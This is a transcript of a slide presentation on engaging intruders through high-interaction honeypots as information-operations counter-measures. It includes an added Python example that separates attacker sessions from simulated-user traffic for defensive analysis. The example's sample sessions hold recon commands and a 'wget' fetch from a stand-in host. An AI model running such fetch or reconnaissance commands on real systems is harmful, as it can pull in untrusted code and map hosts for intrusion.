Engaging the Adversary as a Viable Response to Network Intrusion - PowerPoint PPT Presentation

Transcript and Presenter's Notes

1
Engaging the Adversary as a Viable Response to
Network Intrusion
  • Sylvain P. Leblanc, G. Scott Knight
  • Workshop on Cyber Infrastructure and Emergency
    Preparedness

2
Another title
We're going to hold onto him by the nose, and
we're going to kick him in the ass.
General George S. Patton, England, May 31, 1944
3
1 - Introduction
The standard response predicated on Protect,
Detect and React is no longer sufficient.
It is important to gain information about those
who threaten the infrastructure.
4
Outline
  • Information Operations
  • Honeypots
  • Honeypots as IO Counter-measures Tools
  • Conclusion

5
2 - Information Operations (IO)
  • IO are defined as actions taken in support of
    political and military objectives which influence
    decision makers by affecting others' information
    while exploiting, or fully utilizing, one's own
    information.

6
Offensive IO
Actions taken to influence adversary
decision-makers, with the aim of preventing
adversary decision-making processes from
achieving their desired result.
7
Defensive IO
Actions taken to protect one's own information,
so that friendly decision-makers can have timely
access to necessary, relevant, and accurate
information.
  • Protection
  • Defensive Counter-Information Operations (IO
    Counter-measures)
  • Offensive Counter-Information Operations

8
Signals Intelligence (SigInt)
  • Intelligence derived from electromagnetic
    communications and communications systems, by
    other than the intended recipients or users.

9
Computer Network Operations (CNO)
  • CNO represent all aspects of computer related
    operations, but they have three specific
    components:
    • Defence (CND)
    • Attack (CNA)
    • Exploitation (CNE)

10
Network-based IO counter-measures response to
Attack
Within the context of CNE and CNE operations,
the protection of the cyber infrastructure could
be enhanced by developing an effective
network-based IO counter-measures response to
attacks.
11
Operational Objectives
  • Holding Contact with the Adversary
  • Understanding the Adversary
    • Who is attacking?
    • What are they capable of?
    • What are their current mission and objectives?
    • What is the context of the current attack?
  • Preparing the Adversary

12
Network-based IO counter-measures Principles of
Operations
  • Operational Objectives for Active Response
  • Combined Operations
  • Repeatable Operations
  • Risk Management

13
Risk Management
  • Access risks
    • Damage or alter information
    • Exfiltrate more sensitive information than
      expected
    • Push attack to other systems
    • Mount IO counter-counter-measure
  • Denial implications
    • Inability to identify
    • Loss of knowledge on techniques and motivations
    • Loss of ability to influence
    • Encourage adversary to seek other ingress points

14
3 - Honeypots
  • Stem from the difficulty in discriminating
    attacker activity.
  • A honeypot's value lies in being probed, attacked
    and compromised.
  • Honeypots have no production value, making
    discrimination of attacker activity trivial.
  • Credited with many successes.

15
Honeypot Classifications
  • Spitzner suggests two main purposes:
    • Production honeypots
    • Research honeypots
  • Taxonomy
    • Brenton - classified by the tools used.
    • Spitzner - classified by the level of interaction the
      attacker is permitted.

16
Brenton's Taxonomy
  • Deception Services
  • Weakened Systems
  • Hardened Systems
  • User Mode Servers

17
Honeypot Levels of Interaction
Spitzner's Taxonomy is based on the level of
interaction afforded to the attacker.
18
4 - Honeypots as IO Counter-measures Tools
  • Operational use with very high interaction
  • The attacker must feel that he is in a real
    production environment
  • High fidelity environment
  • New tools
    • Provide legitimate operational activity
    • Capture attacker's activity

19
Characteristics of Honeypot based IO
Counter-measures Tools
  • Components and mechanisms undetectable by a user
    with root privileges.
  • Behaviours and communication patterns appear
    legitimate from the vantage point of other hosts on
    the network.
  • Able to simulate a normal human user at the
    interface level.
  • Provide means of observing and collecting
    attacker activity.
  • Make de-conflicting attack traffic
    straightforward.
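The last three characteristics above fit together: because the honeypot has no production value (slide 14), every session is either traffic the operator generates (the simulated user of slide 18, the monitoring infrastructure) or adversary activity, so de-conflicting reduces to knowing one's own sources. The following collector is an added example written for this page, not code from the authors or from any tool they describe. The addresses, the business-hours schedule for the simulated user and the session-record layout are assumptions constructed for the example; the profile it builds answers the "who is attacking / what are they capable of" questions of slide 11 from the captured sessions.

```python
"""Added example (not from the slides): de-conflicting and profiling sessions
captured by a honeypot used as an IO counter-measures tool.

Assumptions (constructed for this example): the operator's user-simulation
hosts and out-of-band monitoring host have known addresses, and simulated
users only work a fixed daytime window.  Collection is assumed to run off the
honeypot itself, so that a root-level intruder sees nothing of it (slide 19).
"""
from collections import Counter
from dataclasses import dataclass, field
from datetime import datetime, time

# Assumed addresses of the operator's own traffic generators.
SIMULATED_USER_SOURCES = {"10.0.5.20", "10.0.5.21"}   # simulated human users
MONITOR_SOURCES = {"10.0.9.2"}                         # out-of-band monitoring
# Assumed schedule: simulated users are active 08:00-18:00 only.  Traffic from
# a simulation host outside that window means the simulation host itself
# deserves a look, so it is kept apart from both classes.
SIM_WINDOW = (time(8, 0), time(18, 0))


@dataclass
class Session:
    """One captured interactive session on the honeypot."""
    src: str
    dst_port: int
    start: datetime
    commands: list = field(default_factory=list)


def classify(session: Session) -> str:
    """Label a session as 'monitor', 'simulated', 'simulation-anomaly' or 'attacker'."""
    if session.src in MONITOR_SOURCES:
        return "monitor"
    if session.src in SIMULATED_USER_SOURCES:
        in_window = SIM_WINDOW[0] <= session.start.time() <= SIM_WINDOW[1]
        return "simulated" if in_window else "simulation-anomaly"
    # No production value: any other source is, by construction, adversary activity.
    return "attacker"


def deconflict(sessions):
    """Split captured sessions into attacker activity and operator-generated activity."""
    attacker, other = [], []
    for s in sessions:
        (attacker if classify(s) == "attacker" else other).append(s)
    return attacker, other


def adversary_profile(attacker_sessions):
    """Summarise who is attacking, which services they touch and what they run."""
    return {
        "sources": Counter(s.src for s in attacker_sessions),
        "ports": Counter(s.dst_port for s in attacker_sessions),
        "commands": Counter(c for s in attacker_sessions for c in s.commands),
    }


# Constructed sample sessions standing in for a day of honeypot captures.
SAMPLE = [
    Session("10.0.5.20", 22, datetime(2024, 3, 4, 9, 15), ["ls", "cat report.txt"]),
    Session("10.0.9.2", 22, datetime(2024, 3, 4, 9, 16), ["uptime"]),
    Session("203.0.113.7", 22, datetime(2024, 3, 4, 2, 40), ["whoami", "uname -a", "id"]),
    Session("203.0.113.7", 445, datetime(2024, 3, 4, 2, 45), []),
    Session("10.0.5.21", 22, datetime(2024, 3, 4, 23, 5), ["wget http://example.invalid/x"]),
]

if __name__ == "__main__":
    attacker, other = deconflict(SAMPLE)
    print(f"{len(attacker)} attacker sessions, {len(other)} operator-generated")
    for s in SAMPLE:
        print(f"{s.start:%H:%M} {s.src:>14} :{s.dst_port:<4} {classify(s)}")
    print(adversary_profile(attacker))
```

Running the block prints the label for each constructed session and a profile of the two attacker sessions (one source, ports 22 and 445, three commands). The third label, `simulation-anomaly`, is the edge case slide 13 warns about under access risks: a simulation host that suddenly behaves out of pattern may have been pushed into the attack, and must not be silently filed as legitimate operational activity.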

20
5 - Conclusion
  • Reactive-oriented defence policy is insufficient.
  • Defence must include an understanding of the
    adversary.
  • First response should not always be to break
    contact.
  • IO Counter-measures to gain information.
  • Principles of Operations for Network-based IO
    counter-measures.
  • Operational Objectives.
  • Key Research Areas include honeypot based tools.

21
5 - Conclusions